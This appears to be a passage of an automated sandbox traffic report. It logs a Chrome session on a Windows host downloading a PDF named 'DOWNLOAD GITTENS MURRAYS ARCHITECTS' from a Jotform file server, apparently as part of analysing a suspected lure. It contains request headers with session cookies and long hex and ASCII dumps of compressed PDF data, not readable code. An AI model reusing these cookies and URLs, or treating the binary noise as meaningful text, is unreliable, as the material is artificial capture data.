                                                                                                                                                                                                                                            Data Ascii: 3463%PDF-1.3%3 0 obj<< /Filter /FlateDecode /Length 3219 >>streamxZY9~_!{zn<1`{|yIc NUT*L'}__>){r9#9G^w_2t%azZ>"PC\Q=H=G'~}rSvsip
                                                                                                                                                                                                                                            2025-01-10 12:36:26 UTC1390INData Raw: f6 38 db 4a 01 8a 11 46 92 85 48 e1 ba 6e 29 07 ab e5 f9 05 5e 3c cc 1b 06 72 9f 6e b6 bc 16 5d 98 fb e8 d9 12 d6 f6 d6 1a f2 d5 d8 d3 46 68 28 e8 dc 71 84 a6 e0 37 79 82 39 64 26 81 63 3f 51 d4 94 38 3d 21 90 32 48 41 80 82 48 5d 62 01 0c 21 57 51 94 80 a6 6b ca fc 06 87 85 7f 8a 42 12 cb 68 33 79 a3 9c a3 b3 9d 57 91 4f 31 51 0c b7 6d 35 b8 6f 04 4d a2 51 56 03 99 c5 4d 04 3f 8c b9 84 58 80 d4 e9 28 6c 52 3e 70 2d 23 e8 de 1f 60 a8 34 0f 39 16 b8 82 8c 20 bb 38 2f b7 65 04 1b e9 57 93 92 9d 4f c4 0a 6f 39 78 2b 9f e9 4c 72 1e 4a 72 c0 c7 90 fa 4c e1 5b 93 36 81 5d 8a a1 4f 9a c4 95 f7 86 1f 29 4d 0e f1 32 9c 24 5c 0d 65 1b 74 93 2e 2d 81 d2 87 9c a7 7e e0 dc 8b 09 30 18 e2 34 38 c3 19 42 08 36 9d 40 48 9b 68 b8 85 e5 48 c2 e0 02 69 26 cc 29 0f bd 4f 39
                                                                                                                                                                                                                                            Data Ascii: 8JFHn)^<rn]Fh(q7y9d&c?Q8=!2HAH]b!WQkBh3yWO1Qm5oMQVM?X(lR>p-#`49 8/eWOo9x+LrJrL[6]O)M2$\et.-~048B6@HhHi&)O9
                                                                                                                                                                                                                                            2025-01-10 12:36:26 UTC1390INData Raw: 4e 3d c2 a2 8f d9 f8 79 7a 3f c4 7d 4f 22 38 a2 9b 41 17 12 c3 c9 b6 a7 ac 69 d8 d5 32 69 8b f7 c0 5b 9a 3d e5 bd 39 ae ed 8b f8 dd 34 bf 3a 5c 2e 6e 88 a4 19 c3 be 33 df e9 45 54 b3 d2 7e 1b 5a 18 92 67 b8 2b 9b ea 74 a3 87 e5 5f 38 0a cc 17 d2 7c e8 52 80 6a 51 1f 5a fd 3a d5 9c f0 4a d4 f6 f1 e0 9c a4 62 e6 d8 ef 90 86 99 5f 3a 17 27 34 79 2d f8 38 d6 40 11 b7 f0 1d b9 b9 63 69 75 ed 9d e4 55 ae 6d 2b a7 a8 74 a7 cc e4 c8 5b de 1b 69 99 72 a2 df d5 48 8b ae 82 37 f6 a5 f8 a1 46 a5 5a 22 bc 57 0b 35 41 98 85 8e da 12 24 a3 e0 f7 76 5f 98 2f b7 48 d3 a9 e3 b1 3d ea 6e f5 ad 6a 09 0a fa c8 4d 5a d5 12 86 c9 24 15 1e 50 3b 12 01 aa 25 06 b2 96 68 35 75 a5 a2 52 89 52 9a 89 3b 50 e8 4a cc ac 2c 78 c4 51 fb b2 7b d8 a4 35 47 82 56 f5 a8 c1 e9 ae 71 e6 0b bf
                                                                                                                                                                                                                                            Data Ascii: N=yz?}O"8Ai2i[=94:\.n3ET~Zg+t_8|RjQZ:Jb_:'4y-8@ciuUm+t[irH7FZ"W5A$v_/H=njMZ$P;%h5uRR;PJ,xQ{5GVq
                                                                                                                                                                                                                                            2025-01-10 12:36:26 UTC1390INData Raw: 20 30 20 52 20 2f 54 54 34 20 39 20 30 20 52 20 2f 54 54 36 20 31 31 20 30 20 52 20 2f 54 54 38 20 31 33 20 30 20 52 20 2f 54 54 39 20 31 36 20 30 20 52 20 2f 54 54 31 31 0a 31 38 20 30 20 52 20 2f 54 54 31 33 20 32 30 20 30 20 52 20 2f 54 54 31 35 20 32 32 20 30 20 52 20 2f 54 54 31 37 20 32 34 20 30 20 52 20 2f 54 54 31 39 20 32 36 20 30 20 52 20 2f 54 54 32 31 20 32 39 20 30 20 52 20 2f 54 54 32 33 0a 33 31 20 30 20 52 20 2f 54 54 32 35 20 33 33 20 30 20 52 20 3e 3e 20 2f 58 4f 62 6a 65 63 74 20 3c 3c 20 2f 49 6d 31 20 33 34 20 30 20 52 20 2f 49 6d 32 20 33 35 20 30 20 52 20 2f 49 6d 33 20 33 36 20 30 20 52 20 2f 49 6d 34 0a 33 37 20 30 20 52 20 3e 3e 20 3e 3e 0a 65 6e 64 6f 62 6a 0a 31 34 20 30 20 6f 62 6a 0a 5b 20 31 35 20 30 20 52 20 32 37 20 30 20
                                                                                                                                                                                                                                            Data Ascii: 0 R /TT4 9 0 R /TT6 11 0 R /TT8 13 0 R /TT9 16 0 R /TT1118 0 R /TT13 20 0 R /TT15 22 0 R /TT17 24 0 R /TT19 26 0 R /TT21 29 0 R /TT2331 0 R /TT25 33 0 R >> /XObject << /Im1 34 0 R /Im2 35 0 R /Im3 36 0 R /Im437 0 R >> >>endobj14 0 obj[ 15 0 R 27 0
                                                                                                                                                                                                                                            2025-01-10 12:36:26 UTC1390INData Raw: d8 a6 6b 09 ad 9c 35 7f e5 9f 47 3f 6a 1f c8 1c 7b cc b1 ef 7a e7 bb 3e f1 f1 4f 68 c1 d3 4e 3d f5 94 cf 9c f2 d1 8f 7c f4 bd ef 79 cf 1b 5f ff 06 8d 78 e8 21 4f 7b d4 5e 8f 5c 1f 6f 54 a9 52 af e3 de f8 a6 88 a7 e3 ac d5 be 8a e4 ac b5 67 1e fa 8c e8 5e ca ac 9a 53 6b 5a b5 68 19 93 fa 54 4d 6b 94 7d f7 79 4c 34 a7 6d b5 e4 ac 6f e9 e9 40 90 7c f6 61 87 3f e5 49 4f c6 1e bb 3c e0 81 6a c1 b8 c2 60 2b 76 75 7d 6f 8b 5b 5b f2 71 6f 3a ee e8 57 bf 86 6c 8a 3d e8 c0 c7 ef fa e0 87 de fd ce 77 85 2a 3e 61 d8 d4 d2 96 d3 e9 dd b7 bf f5 6d 0d 3d 41 f5 79 cf 79 ae a2 7a b2 a5 34 26 b4 f1 eb c0 fd 0f 78 e5 51 af 20 c6 d3 9e 72 08 46 62 1a 2d bf 2b bf 86 63 ef 7d 8f 7b 1a ef d4 e2 35 af 7a b5 21 8f ed bd fc 6c 9e 42 77 ec 9c d7 bf f6 75 9f fa e4 27 71 ce 99 df 3d
                                                                                                                                                                                                                                            Data Ascii: k5G?j{z>OhN=|y_x!O{^\oTRg^SkZhTMk}yL4mo@|a?IO<j`+vu}o[[qo:Wl=w*>am=Ayyz4&xQ rFb-+c}{5z!lBwu'q=
                                                                                                                                                                                                                                            2025-01-10 12:36:26 UTC1390INData Raw: c0 4c e5 2f 2b 0d ad 55 f6 0b 43 d2 2e e1 a0 27 1e 74 30 b3 93 26 4b f7 ac bb da 8b ab 2e a5 bf d0 3a 5d 9e 26 ac ba ee 77 ef fb 18 44 34 8a 8a f0 1d 04 31 c8 83 2a 57 65 f3 27 13 51 df f1 76 97 84 3f db 3c 1e f4 b8 42 14 a5 40 c5 2a dc 2b da 9c 84 21 52 ad 6f 95 5f 2b 60 e0 f6 a9 f6 0e 49 50 50 1d 01 ab d6 fd fd ef 7f a7 4e fe 49 8c 8c 4a 69 af 5a 42 af c7 85 db d1 cb 97 be f8 25 83 3b 96 63 f6 68 a0 1a 77 8d 9e 10 8f 90 c6 0e 46 2c 37 1c fd 8e fb 86 55 cf ab 54 95 37 d0 88 2e 49 85 e0 59 f3 2f a7 e3 1f 71 3d 8c a1 28 94 9d 46 21 ff f4 a7 3f 55 cd a9 25 6c 7d 16 ea 69 a3 be 89 fc d5 97 a6 b1 01 a8 0a f0 0d 34 bc 09 43 79 8d 34 46 fe 8a 9b ae 4a 2d f1 15 b5 ac ba c4 21 4a 47 d3 40 c6 11 e4 63 1c a4 36 88 88 45 c4 35 a3 f3 15 8d 5e ba a2 7a fe ef cf d7 cd
                                                                                                                                                                                                                                            Data Ascii: L/+UC.'t0&K.:]&wD41*We'Qv?<B@*+!Ro_+`IPPNIJiZB%;chwF,7UT7.IY/q=(F!?U%l}i4Cy4FJ-!JG@c6E5^z
                                                                                                                                                                                                                                            2025-01-10 12:36:26 UTC1390INData Raw: aa 2a 5b 58 0b 9b 21 1f d3 34 82 63 1e 79 d0 03 77 ee b1 56 7d 76 ad e9 c9 42 41 ac b6 63 7a ab 79 52 4a 45 57 63 c1 8a 54 5b 73 62 c2 d7 78 c7 90 6e 71 6e 4b 68 59 c8 8c b0 91 ee 98 a3 8f 61 51 24 3e 6c f9 93 02 b5 f8 66 57 f0 b6 6f 59 eb 9d 56 2a cb 9e cd b6 33 f5 99 34 22 45 3a 20 52 b2 fd b0 57 72 fa 2c 53 c1 b8 9c e5 31 89 9a 42 c6 b3 5c 0f f3 fe 97 2d 16 8a f7 64 94 17 dd ca 7c a8 fe a5 cf 56 04 2a 6e e3 2c c4 7f d1 fd 99 19 b4 65 d9 72 08 aa 3c 29 01 6d 7c c5 7c 12 d8 31 55 2a de c2 2e 15 50 62 84 b3 c0 0d 55 23 31 ea d8 2d a6 c2 3d c5 29 23 70 f5 b6 f2 2e 4b 53 ac 55 b0 b8 51 b1 34 99 dd b5 1c 61 c8 8a 74 13 88 a6 11 13 9f e7 8e a9 60 8f b5 2a 7a 6b 4d 4f 16 0a 62 55 eb c2 42 6c 57 ab 49 0d 16 96 98 8a 4e 1b 3e 12 dd ed ad 32 6d 4b 68 59 28 eb 5d
                                                                                                                                                                                                                                            Data Ascii: *[X!4cywV}vBAczyRJEWcT[sbxnqnKhYaQ$>lfWoYV*34"E: RWr,S1B\-d|V*n,er<)m||1U*.PbU#1-=)#p.KSUQ4at`*zkMObUBlWIN>2mKhY(]
                                                                                                                                                                                                                                            2025-01-10 12:36:26 UTC1390INData Raw: 49 2c 9c 05 4f f7 75 4c d1 2d f0 62 15 0b 2f 21 c0 99 6a b5 b4 e2 96 38 4f 5a a4 96 c9 92 a4 4b ca f1 13 93 92 67 ad 11 75 73 7d 8d d1 d5 6b af 8a ea 32 c3 30 b1 f0 9b c2 05 af 5a a6 6a 65 ce 1d 06 ad c1 8b e6 a0 b8 b4 6c d6 1c d2 2b 4e a8 91 d4 96 ae de b3 f5 fe 5a db 2e 51 29 46 35 90 7b 66 80 21 60 e5 ec a0 fa ae 11 5d aa f9 93 ae 6d b4 3e ed aa 65 d6 fa 6e 84 85 28 d8 45 ee a9 cf 1e ff b5 46 75 62 eb ea 80 06 3e c6 3c e5 61 3f 60 24 c3 2b d3 7a 7d 98 44 1b 85 02 ec 1d 30 3c 31 bf b9 63 7a 0a d7 8c c2 f0 02 30 12 45 b2 11 40 84 81 05 d2 ee fb ae 18 f6 d2 bd 96 4a 8d 32 23 4c 57 fd 53 1d 7f d6 be 53 fd 02 9e 23 15 82 de 4a 7c 72 44 73 6a cb ae 4f 4f d6 ea 91 65 e6 9d 45 c4 35 ab 7d 01 f3 c0 d3 4d 4a 62 6a 0f e5 32 57 98 a3 28 68 b3 ab 0a 2b 6e 59 53 94
                                                                                                                                                                                                                                            Data Ascii: I,OuL-b/!j8OZKgus}k20Zjel+NZ.Q)F5{f!`]m>en(EFub><a?`$+z}D0<1cz0E@J2#LWSS#J|rDsjOOeE5}MJbj2W(h+nYS
                                                                                                                                                                                                                                            2025-01-10 12:36:26 UTC1390INData Raw: 0b 85 31 4c 35 2a 2d 51 65 74 a4 c9 7a eb f7 2a 6e 3d 16 0a 7a 8c 2e cb ae 32 73 8a 2b 98 43 bd 93 eb 0c 1f 0c a1 9c ae 16 5f 9e 71 2b 94 54 3d c7 36 2d 83 6c d9 c9 38 7e 06 c2 88 fc 2d da f5 4e f4 9c 5b 87 63 13 9b 1a f1 64 6b 09 49 4f 16 6a 31 e9 dd a9 ad 36 c2 21 99 2f 13 51 d1 34 da 48 18 59 24 50 cc 33 67 67 8d 94 d0 93 a4 de af fd 0b d7 ad e3 6c c6 91 7a d5 78 29 d7 43 9f d2 8f 6c a6 66 17 51 7b 31 52 4c d8 ee ef 18 61 a1 ea f1 e5 9c 0a 21 5c 6a 49 c3 85 9e 6a 4d db b4 88 3d c2 c1 1b 02 2f 10 e6 56 e8 e9 3c 82 36 67 45 69 19 f9 7c bd 2e 67 bd 2e 47 72 2a 6e 3d 16 8a 24 59 9f c3 93 65 b0 91 13 5c 78 86 a7 d6 b2 65 c5 b9 9d 0b 68 eb 95 3b 35 02 30 1e a3 1e 97 bf f7 de c4 06 71 ac 63 1f 32 4f b7 be 71 64 b2 50 0f e1 f6 7e 6d b5 65 4d ce b3 b1 57 6d 4c
                                                                                                                                                                                                                                            Data Ascii: 1L5*-Qetz*n=z.2s+C_q+T=6-l8~-N[cdkIOj16!/Q4HY$P3gglzx)ClfQ{1RLa!\jIjM=/V<6gEi|.g.Gr*n=$Ye\xeh;50qc2OqdP~meMWmL
                                                                                                                                                                                                                                            2025-01-10 12:36:26 UTC1390INData Raw: 5e af ba 62 3f 7b 42 8d 74 0b 6b e4 c6 35 27 56 7d d6 36 44 87 8d a7 d9 33 e2 15 aa 2f 1e 1e 04 52 77 aa ab d6 32 20 2b 56 10 0a 5a 5e 9f 50 f5 a7 87 7c 45 29 8c 61 eb a5 61 3a de 6e fb 55 a6 8a db 78 2f 36 4c e8 a7 f1 22 33 17 9f 73 a8 18 5a 22 45 1c 31 8c 27 d8 be 72 46 53 95 6a 39 5d 7d 3a 76 85 39 d9 9c 10 db 1b 95 d6 27 7f 4f 86 b4 60 d6 e5 0a 4d 9b e8 34 a0 a0 97 44 8a 68 a9 ca 42 7e d5 b5 c9 7d 3b ef 3c 79 84 4c c5 13 8c aa d5 4b ad ef 1a d7 a5 fa 54 ad e3 48 bb d7 67 db 74 d5 a2 8d b0 50 fa 0e 9d b9 c8 7f 62 92 9b 96 d7 96 2f e0 6c a4 46 35 82 67 74 40 44 3d 4c 78 ca cc 54 56 10 23 c7 22 37 93 d7 e6 d7 74 b7 da 7c 06 8e d8 00 3a 88 fe 48 d9 04 1c a8 71 6c fb 16 bd e5 3b e3 f5 4a 8c 3a ab 2e c3 e7 cb fb 05 c6 35 27 56 7d 76 b8 44 87 cd bb 61 18 fa
                                                                                                                                                                                                                                            Data Ascii: ^b?{Btk5'V}6D3/Rw2 +VZ^P|E)aa:nUx/6L"3sZ"E1'rFSj9]}:v9'O`M4DhB~};<yLKTHgtPb/lF5gt@D=LxTV#"7t|:Hql;J:.5'V}vDa


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            110192.168.2.174982534.107.251.1254435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:27 UTC644OUTGET /jufs/Gittens_Murray/form_files/DOWNLOAD%20GITTENS%20MURRAYS%20ARCHITECTS.678101120618b4.41192529.pdf?md5=ufTBvV4o_hZ61vxTbutwig&expires=1736510740 HTTP/1.1
                                                                                                                                                                                                                                            Host: eu-files.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:27 UTC628INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            access-control-allow-headers: Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization, accept, origin, Cache-Control, X-Requested-With, newrelic, traceparent, tracestate
                                                                                                                                                                                                                                            access-control-allow-methods: OPTIONS, GET
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            cache-control: public,max-age=7200
                                                                                                                                                                                                                                            content-disposition: attachment; filename="DOWNLOAD GITTENS MURRAYS ARCHITECTS.678101120618b4.41192529.pdf"
                                                                                                                                                                                                                                            content-type: application/octet-stream
                                                                                                                                                                                                                                            date: Fri, 10 Jan 2025 12:36:27 GMT
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            2025-01-10 12:36:27 UTC762INData Raw: 33 34 36 33 0d 0a 25 50 44 46 2d 31 2e 33 0a 25 c4 e5 f2 e5 eb a7 f3 a0 d0 c4 c6 0a 33 20 30 20 6f 62 6a 0a 3c 3c 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4c 65 6e 67 74 68 20 33 32 31 39 20 3e 3e 0a 73 74 72 65 61 6d 0a 78 01 bd 5a 59 93 1c 39 11 7e af 5f 21 7b cc 7a 1a bb cb a5 ab 0e 6e bc cb 03 3c b1 11 1d c1 03 c3 03 e1 f0 c6 b2 31 b3 60 7b f9 ff 7c 79 49 aa ee ea 63 20 02 cc 4e 55 aa a4 54 2a ef 4c f5 27 f7 ad fb e4 de 7d fd c5 bb 0f 5f 9c e7 7f 5f 3e b8 29 e0 ff 83 7b 72 39 c8 db 23 bf c5 c9 f7 39 b8 47 fa 5e de bf 77 df b9 a1 5f a6 90 d3 32 74 e5 ad 8e b9 f3 08 c7 25 f7 61 16 84 e5 9d 10 7a 5a 3e 0e d3 9c 22 50 ce 43 5c 82 1f 19 51 ee 3d 48 f2 13 3d 9e 9c f7 c9 80 47 06 0a 96 89 27 16 90 90 7e db 7d 72 53 76 18 73 69 70
                                                                                                                                                                                                                                            Data Ascii: 3463%PDF-1.3%3 0 obj<< /Filter /FlateDecode /Length 3219 >>streamxZY9~_!{zn<1`{|yIc NUT*L'}__>){r9#9G^w_2t%azZ>"PC\Q=H=G'~}rSvsip
                                                                                                                                                                                                                                            2025-01-10 12:36:27 UTC1390INData Raw: f6 38 db 4a 01 8a 11 46 92 85 48 e1 ba 6e 29 07 ab e5 f9 05 5e 3c cc 1b 06 72 9f 6e b6 bc 16 5d 98 fb e8 d9 12 d6 f6 d6 1a f2 d5 d8 d3 46 68 28 e8 dc 71 84 a6 e0 37 79 82 39 64 26 81 63 3f 51 d4 94 38 3d 21 90 32 48 41 80 82 48 5d 62 01 0c 21 57 51 94 80 a6 6b ca fc 06 87 85 7f 8a 42 12 cb 68 33 79 a3 9c a3 b3 9d 57 91 4f 31 51 0c b7 6d 35 b8 6f 04 4d a2 51 56 03 99 c5 4d 04 3f 8c b9 84 58 80 d4 e9 28 6c 52 3e 70 2d 23 e8 de 1f 60 a8 34 0f 39 16 b8 82 8c 20 bb 38 2f b7 65 04 1b e9 57 93 92 9d 4f c4 0a 6f 39 78 2b 9f e9 4c 72 1e 4a 72 c0 c7 90 fa 4c e1 5b 93 36 81 5d 8a a1 4f 9a c4 95 f7 86 1f 29 4d 0e f1 32 9c 24 5c 0d 65 1b 74 93 2e 2d 81 d2 87 9c a7 7e e0 dc 8b 09 30 18 e2 34 38 c3 19 42 08 36 9d 40 48 9b 68 b8 85 e5 48 c2 e0 02 69 26 cc 29 0f bd 4f 39
                                                                                                                                                                                                                                            Data Ascii: 8JFHn)^<rn]Fh(q7y9d&c?Q8=!2HAH]b!WQkBh3yWO1Qm5oMQVM?X(lR>p-#`49 8/eWOo9x+LrJrL[6]O)M2$\et.-~048B6@HhHi&)O9
                                                                                                                                                                                                                                            2025-01-10 12:36:27 UTC1390INData Raw: 4e 3d c2 a2 8f d9 f8 79 7a 3f c4 7d 4f 22 38 a2 9b 41 17 12 c3 c9 b6 a7 ac 69 d8 d5 32 69 8b f7 c0 5b 9a 3d e5 bd 39 ae ed 8b f8 dd 34 bf 3a 5c 2e 6e 88 a4 19 c3 be 33 df e9 45 54 b3 d2 7e 1b 5a 18 92 67 b8 2b 9b ea 74 a3 87 e5 5f 38 0a cc 17 d2 7c e8 52 80 6a 51 1f 5a fd 3a d5 9c f0 4a d4 f6 f1 e0 9c a4 62 e6 d8 ef 90 86 99 5f 3a 17 27 34 79 2d f8 38 d6 40 11 b7 f0 1d b9 b9 63 69 75 ed 9d e4 55 ae 6d 2b a7 a8 74 a7 cc e4 c8 5b de 1b 69 99 72 a2 df d5 48 8b ae 82 37 f6 a5 f8 a1 46 a5 5a 22 bc 57 0b 35 41 98 85 8e da 12 24 a3 e0 f7 76 5f 98 2f b7 48 d3 a9 e3 b1 3d ea 6e f5 ad 6a 09 0a fa c8 4d 5a d5 12 86 c9 24 15 1e 50 3b 12 01 aa 25 06 b2 96 68 35 75 a5 a2 52 89 52 9a 89 3b 50 e8 4a cc ac 2c 78 c4 51 fb b2 7b d8 a4 35 47 82 56 f5 a8 c1 e9 ae 71 e6 0b bf
                                                                                                                                                                                                                                            Data Ascii: N=yz?}O"8Ai2i[=94:\.n3ET~Zg+t_8|RjQZ:Jb_:'4y-8@ciuUm+t[irH7FZ"W5A$v_/H=njMZ$P;%h5uRR;PJ,xQ{5GVq
                                                                                                                                                                                                                                            2025-01-10 12:36:27 UTC1390INData Raw: 20 30 20 52 20 2f 54 54 34 20 39 20 30 20 52 20 2f 54 54 36 20 31 31 20 30 20 52 20 2f 54 54 38 20 31 33 20 30 20 52 20 2f 54 54 39 20 31 36 20 30 20 52 20 2f 54 54 31 31 0a 31 38 20 30 20 52 20 2f 54 54 31 33 20 32 30 20 30 20 52 20 2f 54 54 31 35 20 32 32 20 30 20 52 20 2f 54 54 31 37 20 32 34 20 30 20 52 20 2f 54 54 31 39 20 32 36 20 30 20 52 20 2f 54 54 32 31 20 32 39 20 30 20 52 20 2f 54 54 32 33 0a 33 31 20 30 20 52 20 2f 54 54 32 35 20 33 33 20 30 20 52 20 3e 3e 20 2f 58 4f 62 6a 65 63 74 20 3c 3c 20 2f 49 6d 31 20 33 34 20 30 20 52 20 2f 49 6d 32 20 33 35 20 30 20 52 20 2f 49 6d 33 20 33 36 20 30 20 52 20 2f 49 6d 34 0a 33 37 20 30 20 52 20 3e 3e 20 3e 3e 0a 65 6e 64 6f 62 6a 0a 31 34 20 30 20 6f 62 6a 0a 5b 20 31 35 20 30 20 52 20 32 37 20 30 20
                                                                                                                                                                                                                                            Data Ascii: 0 R /TT4 9 0 R /TT6 11 0 R /TT8 13 0 R /TT9 16 0 R /TT1118 0 R /TT13 20 0 R /TT15 22 0 R /TT17 24 0 R /TT19 26 0 R /TT21 29 0 R /TT2331 0 R /TT25 33 0 R >> /XObject << /Im1 34 0 R /Im2 35 0 R /Im3 36 0 R /Im437 0 R >> >>endobj14 0 obj[ 15 0 R 27 0
                                                                                                                                                                                                                                            2025-01-10 12:36:27 UTC1390INData Raw: d8 a6 6b 09 ad 9c 35 7f e5 9f 47 3f 6a 1f c8 1c 7b cc b1 ef 7a e7 bb 3e f1 f1 4f 68 c1 d3 4e 3d f5 94 cf 9c f2 d1 8f 7c f4 bd ef 79 cf 1b 5f ff 06 8d 78 e8 21 4f 7b d4 5e 8f 5c 1f 6f 54 a9 52 af e3 de f8 a6 88 a7 e3 ac d5 be 8a e4 ac b5 67 1e fa 8c e8 5e ca ac 9a 53 6b 5a b5 68 19 93 fa 54 4d 6b 94 7d f7 79 4c 34 a7 6d b5 e4 ac 6f e9 e9 40 90 7c f6 61 87 3f e5 49 4f c6 1e bb 3c e0 81 6a c1 b8 c2 60 2b 76 75 7d 6f 8b 5b 5b f2 71 6f 3a ee e8 57 bf 86 6c 8a 3d e8 c0 c7 ef fa e0 87 de fd ce 77 85 2a 3e 61 d8 d4 d2 96 d3 e9 dd b7 bf f5 6d 0d 3d 41 f5 79 cf 79 ae a2 7a b2 a5 34 26 b4 f1 eb c0 fd 0f 78 e5 51 af 20 c6 d3 9e 72 08 46 62 1a 2d bf 2b bf 86 63 ef 7d 8f 7b 1a ef d4 e2 35 af 7a b5 21 8f ed bd fc 6c 9e 42 77 ec 9c d7 bf f6 75 9f fa e4 27 71 ce 99 df 3d
                                                                                                                                                                                                                                            Data Ascii: k5G?j{z>OhN=|y_x!O{^\oTRg^SkZhTMk}yL4mo@|a?IO<j`+vu}o[[qo:Wl=w*>am=Ayyz4&xQ rFb-+c}{5z!lBwu'q=
                                                                                                                                                                                                                                            2025-01-10 12:36:27 UTC1390INData Raw: c0 4c e5 2f 2b 0d ad 55 f6 0b 43 d2 2e e1 a0 27 1e 74 30 b3 93 26 4b f7 ac bb da 8b ab 2e a5 bf d0 3a 5d 9e 26 ac ba ee 77 ef fb 18 44 34 8a 8a f0 1d 04 31 c8 83 2a 57 65 f3 27 13 51 df f1 76 97 84 3f db 3c 1e f4 b8 42 14 a5 40 c5 2a dc 2b da 9c 84 21 52 ad 6f 95 5f 2b 60 e0 f6 a9 f6 0e 49 50 50 1d 01 ab d6 fd fd ef 7f a7 4e fe 49 8c 8c 4a 69 af 5a 42 af c7 85 db d1 cb 97 be f8 25 83 3b 96 63 f6 68 a0 1a 77 8d 9e 10 8f 90 c6 0e 46 2c 37 1c fd 8e fb 86 55 cf ab 54 95 37 d0 88 2e 49 85 e0 59 f3 2f a7 e3 1f 71 3d 8c a1 28 94 9d 46 21 ff f4 a7 3f 55 cd a9 25 6c 7d 16 ea 69 a3 be 89 fc d5 97 a6 b1 01 a8 0a f0 0d 34 bc 09 43 79 8d 34 46 fe 8a 9b ae 4a 2d f1 15 b5 ac ba c4 21 4a 47 d3 40 c6 11 e4 63 1c a4 36 88 88 45 c4 35 a3 f3 15 8d 5e ba a2 7a fe ef cf d7 cd
                                                                                                                                                                                                                                            Data Ascii: L/+UC.'t0&K.:]&wD41*We'Qv?<B@*+!Ro_+`IPPNIJiZB%;chwF,7UT7.IY/q=(F!?U%l}i4Cy4FJ-!JG@c6E5^z
                                                                                                                                                                                                                                            2025-01-10 12:36:27 UTC1390INData Raw: aa 2a 5b 58 0b 9b 21 1f d3 34 82 63 1e 79 d0 03 77 ee b1 56 7d 76 ad e9 c9 42 41 ac b6 63 7a ab 79 52 4a 45 57 63 c1 8a 54 5b 73 62 c2 d7 78 c7 90 6e 71 6e 4b 68 59 c8 8c b0 91 ee 98 a3 8f 61 51 24 3e 6c f9 93 02 b5 f8 66 57 f0 b6 6f 59 eb 9d 56 2a cb 9e cd b6 33 f5 99 34 22 45 3a 20 52 b2 fd b0 57 72 fa 2c 53 c1 b8 9c e5 31 89 9a 42 c6 b3 5c 0f f3 fe 97 2d 16 8a f7 64 94 17 dd ca 7c a8 fe a5 cf 56 04 2a 6e e3 2c c4 7f d1 fd 99 19 b4 65 d9 72 08 aa 3c 29 01 6d 7c c5 7c 12 d8 31 55 2a de c2 2e 15 50 62 84 b3 c0 0d 55 23 31 ea d8 2d a6 c2 3d c5 29 23 70 f5 b6 f2 2e 4b 53 ac 55 b0 b8 51 b1 34 99 dd b5 1c 61 c8 8a 74 13 88 a6 11 13 9f e7 8e a9 60 8f b5 2a 7a 6b 4d 4f 16 0a 62 55 eb c2 42 6c 57 ab 49 0d 16 96 98 8a 4e 1b 3e 12 dd ed ad 32 6d 4b 68 59 28 eb 5d
                                                                                                                                                                                                                                            Data Ascii: *[X!4cywV}vBAczyRJEWcT[sbxnqnKhYaQ$>lfWoYV*34"E: RWr,S1B\-d|V*n,er<)m||1U*.PbU#1-=)#p.KSUQ4at`*zkMObUBlWIN>2mKhY(]
                                                                                                                                                                                                                                            2025-01-10 12:36:27 UTC1390INData Raw: 49 2c 9c 05 4f f7 75 4c d1 2d f0 62 15 0b 2f 21 c0 99 6a b5 b4 e2 96 38 4f 5a a4 96 c9 92 a4 4b ca f1 13 93 92 67 ad 11 75 73 7d 8d d1 d5 6b af 8a ea 32 c3 30 b1 f0 9b c2 05 af 5a a6 6a 65 ce 1d 06 ad c1 8b e6 a0 b8 b4 6c d6 1c d2 2b 4e a8 91 d4 96 ae de b3 f5 fe 5a db 2e 51 29 46 35 90 7b 66 80 21 60 e5 ec a0 fa ae 11 5d aa f9 93 ae 6d b4 3e ed aa 65 d6 fa 6e 84 85 28 d8 45 ee a9 cf 1e ff b5 46 75 62 eb ea 80 06 3e c6 3c e5 61 3f 60 24 c3 2b d3 7a 7d 98 44 1b 85 02 ec 1d 30 3c 31 bf b9 63 7a 0a d7 8c c2 f0 02 30 12 45 b2 11 40 84 81 05 d2 ee fb ae 18 f6 d2 bd 96 4a 8d 32 23 4c 57 fd 53 1d 7f d6 be 53 fd 02 9e 23 15 82 de 4a 7c 72 44 73 6a cb ae 4f 4f d6 ea 91 65 e6 9d 45 c4 35 ab 7d 01 f3 c0 d3 4d 4a 62 6a 0f e5 32 57 98 a3 28 68 b3 ab 0a 2b 6e 59 53 94
                                                                                                                                                                                                                                            Data Ascii: I,OuL-b/!j8OZKgus}k20Zjel+NZ.Q)F5{f!`]m>en(EFub><a?`$+z}D0<1cz0E@J2#LWSS#J|rDsjOOeE5}MJbj2W(h+nYS
